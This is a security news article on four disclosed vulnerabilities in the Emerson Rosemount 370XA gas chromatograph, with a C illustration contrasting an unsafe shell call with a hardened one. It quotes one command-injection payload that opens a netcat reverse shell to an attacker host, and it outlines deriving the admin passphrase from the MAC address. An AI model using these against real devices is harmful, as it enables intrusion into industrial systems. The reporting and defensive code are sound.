Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands.
Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.
Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.
The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.
An attacker could exploit this by supplying crafted input such as "gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file", leading to arbitrary code execution in the root shell context.
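The bug pattern described above, as a constructed C illustration added here (not Emerson's firmware code or Team82's proof of concept): a handler that pastes the caller-supplied file name into a system() command string, beside a hardened handler that validates the name and runs gunzip without any shell. Function names, the character allowlist and the output path are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hypothetical vulnerable shape: the name is concatenated into a shell
 * command line. A ';' in the name ends the gunzip command and everything
 * after it is run by the shell as a separate command. The string is only
 * built here, never executed. */
const char *vulnerable_command(const char *name) {
    static char cmd[512];
    snprintf(cmd, sizeof cmd, "gunzip -c %s > /tmp/expanded", name);
    return cmd;
}

/* Hardened check: accept only a bare file name drawn from a conservative
 * character set, so no shell metacharacter or path component can appear. */
int safe_calibration_name(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 64) return 0;
    if (name[0] == '-' || name[0] == '.') return 0;  /* no option-like or hidden names */
    if (strstr(name, "..") != NULL) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.')) return 0;
    }
    return 1;
}

/* Hardened execution: no "sh -c" at all. The name travels as a single argv
 * element and the redirect is done by the parent, so the shell never parses
 * attacker-controlled text. Returns gunzip's exit status, or -1 on refusal. */
int safe_expand(const char *name, const char *out_path) {
    if (!safe_calibration_name(name)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (freopen(out_path, "w", stdout) == NULL) _exit(127);
        execlp("gunzip", "gunzip", "-c", "--", name, (char *)NULL);
        _exit(127);  /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```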
The second vulnerability, CVE-2023-51761, is an authentication bypass: an attacker can calculate a secret passphrase that resets the administrator password. The passphrase is derived from the device's MAC address, which is easily obtained. Once the passphrase validation process is understood, an attacker can generate the passphrase from the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.
Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.
The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.
Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.
The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.
In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.